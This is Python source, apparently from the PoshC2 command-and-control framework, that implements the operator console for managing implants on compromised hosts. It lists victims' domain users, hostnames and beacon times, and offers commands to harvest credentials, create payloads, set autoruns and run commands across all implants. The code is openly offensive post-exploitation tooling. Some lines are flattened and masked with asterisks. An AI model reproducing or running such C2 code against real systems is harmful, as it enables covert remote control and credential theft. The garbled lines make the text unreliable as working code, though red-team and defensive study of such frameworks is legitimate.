def do_quit(user, command): ri = input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": return if ri == "" or ri.lower() == "y": new_c2_message("%s logged off." % user) sys.exit(0)
def main(args): signal.signal(signal.SIGINT, catch_exit) user = None if len(args) > 0: parser = argparse.ArgumentParser(description='The command line for handling implants in PoshC2') parser.add_argument('-u', '--user', help='the user for this session') args = parser.parse_args(args) user = args.user while not user: print(Colours.GREEN + "A username is required for logging") user = input("Enter your username: "******"The project database has not been created yet") sys.exit() database_connect() new_c2_message("%s logged on." % user) clear() implant_handler_command_loop(user)
def do_message(user, command): message = command[len("message "):] new_c2_message("Message from %s - %s" % (user, message))
def implant_handler_command_loop(user, printhelp=""): while(True): session = PromptSession(history=FileHistory('%s/.top-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory()) try: if user is not None: print("User: "******"%s%s" % (user, Colours.GREEN)) print("") implants = get_implants() if implants: for implant in implants: ID = implant[0] LastSeen = implant[7] Hostname = implant[3] Domain = implant[11] DomainUser = implant[2] Arch = implant[10] PID = implant[8] Pivot = implant[15] Sleep = implant[13].strip() Label = implant[16] Pivot = get_implant_type_prompt_prefix(ID) LastSeenTime = datetime.strptime(LastSeen, "%d/%m/%Y %H:%M:%S") now = datetime.now() if(Sleep.endswith('s')): sleep_int = int(Sleep[:-1]) elif(Sleep.endswith('m')): sleep_int = int(Sleep[:-1]) * 60 elif(Sleep.endswith('h')): sleep_int = int(Sleep[:-1]) * 60 * 60 else: print(Colours.RED) print("Incorrect sleep format: %s" % Sleep) print(Colours.GREEN) continue nowMinus3Beacons = now - timedelta(seconds=(sleep_int * 3)) nowMinus10Beacons = now - timedelta(seconds=(sleep_int * 10)) sID = "[" + str(ID) + "]" if not Label: sLabel = "" else: sLabel = "[" + Label + "]" if nowMinus10Beacons > LastSeenTime: print(Colours.RED + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot)) shellctr_host = os.getenv("SHELLCTR_HOST") shellctr_user = os.getenv("SHELLCTR_USER") if shellctr_host is not None and shellctr_user is not None: try: urlopen("http://" + shellctr_host + "/remove?host=" + implant[4].split(":")[0] + "&user="******"&source=poshc2&annotation=" + str(ID)) except: pass elif nowMinus3Beacons > LastSeenTime: print(Colours.YELLOW + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot)) else: print(Colours.GREEN + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot)) else: now = datetime.now() print(Colours.RED + "No Implants as of: %s" % now.strftime("%d/%m/%Y %H:%M:%S")) if printhelp: print(printhelp) command = session.prompt("\nSelect ImplantID or ALL or Comma Separated List (Enter to refresh):: ", completer=FirstWordFuzzyWordCompleter(PRECOMMANDS, WORD=True)) print("") command = command.strip() if (command == "") or (command == "back") or (command == "clear"): do_back(user, command) continue if command.startswith("output-to-html"): do_output_to_html(user, command) continue if command.startswith("generate-reports"): do_generate_reports(user, command) continue if command.startswith("message "): do_message(user, command) continue if command.startswith("show-urls") or command.startswith("list-urls"): do_show_urls(user, command) continue if command.startswith("add-autorun"): do_add_autorun(user, command) continue if command.startswith("list-autorun"): do_list_autoruns(user, command) continue if command.startswith("del-autorun"): do_del_autorun(user, command) continue if command.startswith("nuke-autorun"): do_nuke_autoruns(user, command) continue if (command == "automigrate-frompowershell") or (command == "am"): do_automigrate_frompowershell(user, command) continue if command.startswith("show-serverinfo"): do_show_serverinfo(user, command) continue if command.startswith("turnoff-notifications"): do_turnoff_notifications(user, command) continue if command.startswith("turnon-notifications"): do_turnon_notifications(user, command) continue if command.startswith("set-clockworksmsapikey"): do_set_clockworksmsapikey(user, command) continue if command.startswith("set-clockworksmsnumber"): do_set_clockworksmsnumber(user, command) continue if command.startswith("set-killdate"): do_set_killdate(user, command) continue if command.startswith("set-defaultbeacon"): do_set_defaultbeacon(user, command) continue if command.startswith("opsec"): do_opsec(user, command) continue if command.startswith("listmodules"): do_listmodules(user, command) continue if command.startswith('creds ') or command.strip() == "creds": do_creds(user, command) input("Press Enter to continue...") clear() continue if (command == "pwnself") or (command == "p"): do_pwnself(user, command) continue if command == "tasks": do_tasks(user, command) continue if command == "cleartasks": do_cleartasks(user, command) continue if command.startswith("quit"): do_quit(user, command) continue if command.startswith("createdaisypayload"): do_createdaisypayload(user, command) continue if command.startswith("createproxypayload"): do_createproxypayload(user, command) continue if command.startswith("createnewpayload"): do_createnewpayload(user, command) continue if command == "help": do_help(user, command) continue if command == "history": do_history(user, command) continue if command.startswith("use "): do_use(user, command) implant_command_loop(command, user) except KeyboardInterrupt: clear() continue except EOFError: new_c2_message("%s logged off." % user) sys.exit(0) except Exception as e: if 'unable to open database file' not in str(e): print_bad("Error: %s" % e)
def implant_command_loop(implant_id, user): while(True): try: style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) implant_id_orig = implant_id if ("-" in implant_id) or ("all" in implant_id) or ("," in implant_id): print(Colours.GREEN) prompt_commands = COMMANDS command = session.prompt("%s> " % implant_id, completer=FirstWordFuzzyWordCompleter(prompt_commands, WORD=True)) if command == "back" or command == 'clear': do_back(user, command) return else: hostname = get_hostdetails(implant_id) if not hostname: print_bad("Unrecognised implant id or command: %s" % implant_id) return prompt_commands = COMMANDS if hostname[15] == 'Python': prompt_commands = UXCOMMANDS if hostname[15] == 'C#': prompt_commands = SHARPCOMMANDS print(Colours.GREEN) print("%s\\%s @ %s (PID:%s)" % (hostname[11], hostname[2], hostname[3], hostname[8])) command = session.prompt("%s %s> " % (get_implant_type_prompt_prefix(implant_id), implant_id), completer=FirstWordFuzzyWordCompleter(prompt_commands, WORD=True)) if command == "back" or command == 'clear': do_back(user, command) return # if "all" run through all implants get_implants() if implant_id == "all": if command == "back" or command == 'clear': do_back(user, command) return allcommands = command if "\n" in command: ri = input("Do you want to run commands separately? (Y/n) ") implants_split = get_implants() if implants_split: for implant_details in implants_split: # if "\n" in command run each command individually or ask the question if that's what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: run_implant_command(command, implant_details[1], implant_id_orig, user) else: run_implant_command(command, implant_details[1], implant_id_orig, user) else: run_implant_command(command, implant_details[1], implant_id_orig, user) # if "separated list" against single uri elif "," in implant_id: allcommands = command if "\n" in command: ri = input("Do you want to run commands separately? (Y/n) ") implant_split = implant_id.split(",") for split_implant_id in implant_split: implant_randomuri = get_randomuri(split_implant_id) # if "\n" in command run each command individually or ask the question if that's what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) # if "range" against single uri elif "-" in implant_id: allcommands = command if "\n" in command: ri = input("Do you want to run commands separately? (Y/n) ") implant_split = implant_id.split("-") for range_implant_id in range(int(implant_split[0]), int(implant_split[1]) + 1): try: implant_randomuri = get_randomuri(range_implant_id) # if "\n" in command run each command individually or ask the question if that's what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) except Exception: print_bad("Unknown ImplantID") # else run against single uri else: allcommands = command if "\n" in command: ri = input("Do you want to run commands separately? (Y/n) ") implant_randomuri = get_randomuri(implant_id) # if "\n" in command run each command individually or ask the question if that's what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) except KeyboardInterrupt: continue except EOFError: new_c2_message("%s logged off." % user) sys.exit(0) except Exception as e: traceback.print_exc() print_bad(f"Error running against the selected implant ID, ensure you have typed the correct information: {e}") return